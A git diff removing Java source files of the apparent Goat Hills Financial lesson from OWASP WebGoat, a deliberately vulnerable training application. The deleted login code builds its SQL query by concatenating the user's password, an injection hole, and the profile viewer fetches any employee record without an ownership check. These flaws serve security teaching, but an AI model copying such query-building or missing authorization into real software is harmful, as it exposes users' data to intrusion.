- public final static String FINDPROFILE_ACTION = "FindProfile";
-
- public final static String VIEWPROFILE_ACTION = "ViewProfile";
-
- public final static String EDITPROFILE_ACTION = "EditProfile";
-
- public final static String UPDATEPROFILE_ACTION = "UpdateProfile";
-
- public final static String CREATEPROFILE_ACTION = "CreateProfile";
-
- public final static String DELETEPROFILE_ACTION = "DeleteProfile";
-
- public final static String ERROR_ACTION = "error";
-
- private final static Integer DEFAULT_RANKING = new Integer(125);
-
- private Map lessonFunctions = new Hashtable();
-
- public GoatHillsFinancial()
- {
- String myClassName = parseClassName(this.getClass().getName());
- registerActions(myClassName);
- }
-
- protected void registerActions(String className)
- {
- registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
- registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
- registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
- registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
- registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
- // These actions are special in that they chain to other actions.
- registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
- registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
- registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
- registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
- registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
- }
-
- protected final String parseClassName(String fqcn)
- {
- String className = fqcn;
-
- int lastDotIndex = fqcn.lastIndexOf('.');
- if (lastDotIndex > -1) className = fqcn.substring(lastDotIndex + 1);
-
- return className;
- }
-
- protected void registerAction(LessonAction action)
- {
- lessonFunctions.put(action.getActionName(), action);
- }
-
- public String[] getStages()
- {
- return new String[] {};
- }
-
- protected List getHints(WebSession s)
- {
- return new ArrayList();
- }
-
- public String getInstructions(WebSession s)
- {
- return "";
- }
-
- protected LessonAction getAction(String actionName)
- {
- return lessonFunctions.get(actionName);
- }
-
- public void handleRequest(WebSession s)
- {
- if (s.getLessonSession(this) == null) s.openLessonSession(this);
-
- String requestedActionName = null;
- try
- {
- requestedActionName = s.getParser().getStringParameter("action");
- } catch (ParameterNotFoundException pnfe)
- {
- // Let them eat login page.
- requestedActionName = LOGIN_ACTION;
- }
-
- try
- {
- LessonAction action = getAction(requestedActionName);
- if (action == null)
- {
- setCurrentAction(s, ERROR_ACTION);
- }
- else
- {
- // System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " +
- // action.getActionName());
- if (action.requiresAuthentication())
- {
- if (action.isAuthenticated(s))
- {
- action.handleRequest(s);
- }
- else
- throw new UnauthenticatedException();
- }
- else
- {
- // Access to Login does not require authentication.
- action.handleRequest(s);
- }
- }
- } catch (ParameterNotFoundException pnfe)
- {
- // System.out.println("Missing parameter");
- pnfe.printStackTrace();
- setCurrentAction(s, ERROR_ACTION);
- } catch (ValidationException ve)
- {
- // System.out.println("Validation failed");
- ve.printStackTrace();
- setCurrentAction(s, ERROR_ACTION);
- } catch (UnauthenticatedException ue)
- {
- s.setMessage("Login failed");
- // System.out.println("Authentication failure");
- ue.printStackTrace();
- } catch (UnauthorizedException ue2)
- {
- s.setMessage("You are not authorized to perform this function");
- // System.out.println("Authorization failure");
- setCurrentAction(s, ERROR_ACTION);
- ue2.printStackTrace();
- } catch (Exception e)
- {
- // All other errors send the user to the generic error page
- // System.out.println("handleRequest() error");
- e.printStackTrace();
- setCurrentAction(s, ERROR_ACTION);
- }
-
- // All this does for this lesson is ensure that a non-null content exists.
- setContent(new ElementContainer());
- }
-
- public boolean isAuthorized(WebSession s, int userId, String functionId)
- {
- // System.out.println("Checking authorization from " + getCurrentAction(s));
- LessonAction action = getAction(getCurrentAction(s));
- return action.isAuthorized(s, userId, functionId);
- }
-
- public int getUserId(WebSession s) throws ParameterNotFoundException
- {
- LessonAction action = getAction(getCurrentAction(s));
- return action.getUserId(s);
- }
-
- public String getUserName(WebSession s) throws ParameterNotFoundException
- {
- LessonAction action = getAction(getCurrentAction(s));
- return action.getUserName(s);
- }
-
- protected String getJspPath()
- {
- return "/lessons/" + getLessonName() + "/";
- }
-
- public String getTemplatePage(WebSession s)
- {
- return getJspPath() + getLessonName() + ".jsp";
- }
-
- public String getPage(WebSession s)
- {
- String page = getJspPath() + getCurrentAction(s) + ".jsp";
-
- return page;
- }
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- public String getTitle()
- {
- return "Goat Hills Financials";
- }
-
- public String getSourceFileName()
- {
- // FIXME: Need to generalize findSourceResource() and use it on the currently active
- // LessonAction delegate to get its source file.
- // return findSourceResource(getCurrentLessonScreen()....);
- return super.getSourceFileName();
- }
-
- @Override
- protected boolean getDefaultHidden()
- {
- return getClass().equals(GoatHillsFinancial.class);
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-
- @Override
- protected String getLessonName()
- {
- String className = getClass().getName();
- int index = className.lastIndexOf('.');
- if (index > -1) return className.substring(index + 1);
- return super.getLessonName();
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
deleted file mode 100644
index a569390a0..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
+++ /dev/null
@@ -1,29 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-public interface LessonAction
-{
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException, ValidationException;
-
- public String getNextPage(WebSession s);
-
- public String getActionName();
-
- public boolean requiresAuthentication();
-
- public boolean isAuthenticated(WebSession s);
-
- public boolean isAuthorized(WebSession s, int employeeId, String functionId);
-
- public int getUserId(WebSession s) throws ParameterNotFoundException;
-
- public String getUserName(WebSession s) throws ParameterNotFoundException;
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
deleted file mode 100644
index ce684723e..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
+++ /dev/null
@@ -1,112 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.List;
-import java.util.Vector;
-import org.owasp.webgoat.session.EmployeeStub;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class ListStaff extends DefaultLessonAction
-{
-
- public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
- {
- super(lesson, lessonName, actionName);
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException
- {
- getLesson().setCurrentAction(s, getActionName());
-
- if (isAuthenticated(s))
- {
- int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-
- List employees = getAllEmployees(s, userId);
- setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
- }
- else
- throw new UnauthenticatedException();
- }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.LISTSTAFF_ACTION;
- }
-
- public List getAllEmployees(WebSession s, int userId) throws UnauthorizedException
- {
- // Query the database for all employees "owned" by the given employee
-
- List employees = new Vector();
-
- try
- {
- String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
- + "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")";
-
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- answer_results.beforeFirst();
- while (answer_results.next())
- {
- int employeeId = answer_results.getInt("userid");
- String firstName = answer_results.getString("first_name");
- String lastName = answer_results.getString("last_name");
- String role = answer_results.getString("role");
- // System.out.println("Retrieving employee stub for role " + role);
- EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
- employees.add(stub);
- }
- } catch (SQLException sqle)
- {
- s.setMessage("Error getting employees");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error getting employees");
- e.printStackTrace();
- }
-
- return employees;
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
deleted file mode 100644
index 682ab44ac..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
+++ /dev/null
@@ -1,191 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.List;
-import java.util.Vector;
-import org.owasp.webgoat.session.EmployeeStub;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class Login extends DefaultLessonAction
-{
-
- private LessonAction chainedAction;
-
- public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
- {
- super(lesson, lessonName, actionName);
- this.chainedAction = chainedAction;
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
- {
- // System.out.println("Login.handleRequest()");
- getLesson().setCurrentAction(s, getActionName());
-
- List employees = getAllEmployees(s);
- setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
-
- int employeeId = -1;
- try
- {
- employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
- String password = s.getParser().getStringParameter(GoatHillsFinancial.PASSWORD);
-
- // Attempt authentication
- if (login(s, employeeId, password))
- {
- // Execute the chained Action if authentication succeeded.
- try
- {
- chainedAction.handleRequest(s);
- } catch (UnauthenticatedException ue1)
- {
- // System.out.println("Internal server error");
- ue1.printStackTrace();
- } catch (UnauthorizedException ue2)
- {
- // System.out.println("Internal server error");
- ue2.printStackTrace();
- }
- }
- else
- s.setMessage("Login failed");
- } catch (ParameterNotFoundException pnfe)
- {
- // No credentials offered, so we log them out
- setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
- }
- }
-
- /**
- * After this.handleRequest() is called, when the View asks for the current JSP to load, it will
- * get one initialized by this call.
- */
- public String getNextPage(WebSession s)
- {
- String nextPage = GoatHillsFinancial.LOGIN_ACTION;
-
- if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s);
-
- return nextPage;
-
- }
-
- public boolean requiresAuthentication()
- {
- return false;
- }
-
- public boolean login(WebSession s, int userId, String password)
- {
- // System.out.println("Logging in to lesson");
- boolean authenticated = false;
-
- try
- {
- String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'";
-
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- if (answer_results.first())
- {
- setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
- setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID, Integer.toString(userId));
- authenticated = true;
- }
-
- } catch (SQLException sqle)
- {
- s.setMessage("Error logging in");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error logging in");
- e.printStackTrace();
- }
-
- // System.out.println("Lesson login result: " + authenticated);
- return authenticated;
- }
-
- public List getAllEmployees(WebSession s)
- {
- List employees = new Vector();
-
- // Query the database for all roles the given employee belongs to
- // Query the database for all employees "owned" by these roles
-
- try
- {
- String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
- + "where employee.userid=roles.userid";
-
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- answer_results.beforeFirst();
- while (answer_results.next())
- {
- int employeeId = answer_results.getInt("userid");
- String firstName = answer_results.getString("first_name");
- String lastName = answer_results.getString("last_name");
- String role = answer_results.getString("role");
- EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
- employees.add(stub);
- }
- } catch (SQLException sqle)
- {
- s.setMessage("Error getting employees");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error getting employees");
- e.printStackTrace();
- }
-
- return employees;
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
deleted file mode 100644
index f6add7f4f..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
+++ /dev/null
@@ -1,76 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class Logout extends DefaultLessonAction
-{
-
- private LessonAction chainedAction;
-
- public Logout(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
- {
- super(lesson, lessonName, actionName);
- this.chainedAction = chainedAction;
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
- {
- // System.out.println("Logging out");
-
- setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
-
- // FIXME: Maybe we should forward to Login.
- try
- {
- chainedAction.handleRequest(s);
- } catch (UnauthenticatedException ue1)
- {
- // System.out.println("Internal server error");
- ue1.printStackTrace();
- } catch (UnauthorizedException ue2)
- {
- // System.out.println("Internal server error");
- ue2.printStackTrace();
- }
-
- }
-
- public String getNextPage(WebSession s)
- {
- return chainedAction.getNextPage(s);
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
deleted file mode 100644
index a0194a358..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
+++ /dev/null
@@ -1,47 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class SearchStaff extends DefaultLessonAction
-{
-
- public SearchStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
- {
- super(lesson, lessonName, actionName);
- }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.SEARCHSTAFF_ACTION;
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
deleted file mode 100644
index 3e73ddb88..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
+++ /dev/null
@@ -1,212 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class UpdateProfile extends DefaultLessonAction
-{
-
- private LessonAction chainedAction;
-
- public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
- {
- super(lesson, lessonName, actionName);
- this.chainedAction = chainedAction;
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException, ValidationException
- {
- if (isAuthenticated(s))
- {
- int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-
- int subjectId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID, 0);
-
- String firstName = s.getParser().getStringParameter(GoatHillsFinancial.FIRST_NAME);
- String lastName = s.getParser().getStringParameter(GoatHillsFinancial.LAST_NAME);
- String ssn = s.getParser().getStringParameter(GoatHillsFinancial.SSN);
- String title = s.getParser().getStringParameter(GoatHillsFinancial.TITLE);
- String phone = s.getParser().getStringParameter(GoatHillsFinancial.PHONE_NUMBER);
- String address1 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS1);
- String address2 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS2);
- int manager = s.getParser().getIntParameter(GoatHillsFinancial.MANAGER);
- String startDate = s.getParser().getStringParameter(GoatHillsFinancial.START_DATE);
- int salary = s.getParser().getIntParameter(GoatHillsFinancial.SALARY);
- String ccn = s.getParser().getStringParameter(GoatHillsFinancial.CCN);
- int ccnLimit = s.getParser().getIntParameter(GoatHillsFinancial.CCN_LIMIT);
- String disciplinaryActionDate = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_DATE);
- String disciplinaryActionNotes = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_NOTES);
- String personalDescription = s.getParser().getStringParameter(GoatHillsFinancial.DESCRIPTION);
-
- Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
- manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
- personalDescription);
-
- if (subjectId > 0)
- {
- this.changeEmployeeProfile(s, userId, subjectId, employee);
- setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer
- .toString(subjectId));
- }
- else
- this.createEmployeeProfile(s, userId, employee);
-
- try
- {
- chainedAction.handleRequest(s);
- } catch (UnauthenticatedException ue1)
- {
- // System.out.println("Internal server error");
- ue1.printStackTrace();
- } catch (UnauthorizedException ue2)
- {
- // System.out.println("Internal server error");
- ue2.printStackTrace();
- }
- }
- else
- throw new UnauthenticatedException();
- }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.VIEWPROFILE_ACTION;
- }
-
- public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
- throws UnauthorizedException
- {
- try
- {
- // Note: The password field is ONLY set by ChangePassword
- String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
- + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
- + " personal_description = ? WHERE userid = ?;";
- try
- {
- PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
- ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
-
- ps.setString(1, employee.getFirstName());
- ps.setString(2, employee.getLastName());
- ps.setString(3, employee.getSsn());
- ps.setString(4, employee.getTitle());
- ps.setString(5, employee.getPhoneNumber());
- ps.setString(6, employee.getAddress1());
- ps.setString(7, employee.getAddress2());
- ps.setInt(8, employee.getManager());
- ps.setString(9, employee.getStartDate());
- ps.setString(10, employee.getCcn());
- ps.setInt(11, employee.getCcnLimit());
- ps.setString(12, employee.getPersonalDescription());
- ps.setInt(13, subjectId);
- ps.execute();
- } catch (SQLException sqle)
- {
- s.setMessage("Error updating employee profile");
- sqle.printStackTrace();
- }
-
- } catch (Exception e)
- {
- s.setMessage("Error updating employee profile");
- e.printStackTrace();
- }
- }
-
- private int getNextUID(WebSession s)
- {
- int uid = -1;
- try
- {
- Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
- results.first();
- uid = results.getInt("uid");
- } catch (SQLException sqle)
- {
- sqle.printStackTrace();
- s.setMessage("Error updating employee profile");
- }
- return uid + 1;
- }
-
- public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
- {
- try
- {
- int nextId = getNextUID(s);
- String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
-
- try
- {
- PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
- ps.setString(1, employee.getFirstName().toLowerCase());
- ps.setString(2, employee.getLastName());
- ps.setString(3, employee.getSsn());
- ps.setString(4, employee.getTitle());
- ps.setString(5, employee.getPhoneNumber());
- ps.setString(6, employee.getAddress1());
- ps.setString(7, employee.getAddress2());
- ps.setInt(8, employee.getManager());
- ps.setString(9, employee.getStartDate());
- ps.setString(10, employee.getCcn());
- ps.setInt(11, employee.getCcnLimit());
- ps.setString(12, employee.getDisciplinaryActionDate());
- ps.setString(13, employee.getDisciplinaryActionNotes());
- ps.setString(14, employee.getPersonalDescription());
-
- ps.execute();
- } catch (SQLException sqle)
- {
- s.setMessage("Error updating employee profile");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error updating employee profile");
- e.printStackTrace();
- }
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
deleted file mode 100644
index e9d764153..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
+++ /dev/null
@@ -1,124 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class ViewProfile extends DefaultLessonAction
-{
-
- public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
- {
- super(lesson, lessonName, actionName);
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException
- {
- getLesson().setCurrentAction(s, getActionName());
-
- if (isAuthenticated(s))
- {
- int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
- int employeeId = -1;
- try
- {
- // User selected employee
- employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
- } catch (ParameterNotFoundException e)
- {
- // May be an internally selected employee
- employeeId = getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
- }
-
- Employee employee = getEmployeeProfile(s, userId, employeeId);
- setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
- }
- else
- throw new UnauthenticatedException();
-
- }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.VIEWPROFILE_ACTION;
- }
-
- protected Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
- {
- Employee profile = null;
-
- // Query the database for the profile data of the given employee
- try
- {
- String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
-
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- if (answer_results.next())
- {
- // Note: Do NOT get the password field.
- profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
- answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
- .getString("title"), answer_results.getString("phone"), answer_results
- .getString("address1"), answer_results.getString("address2"), answer_results
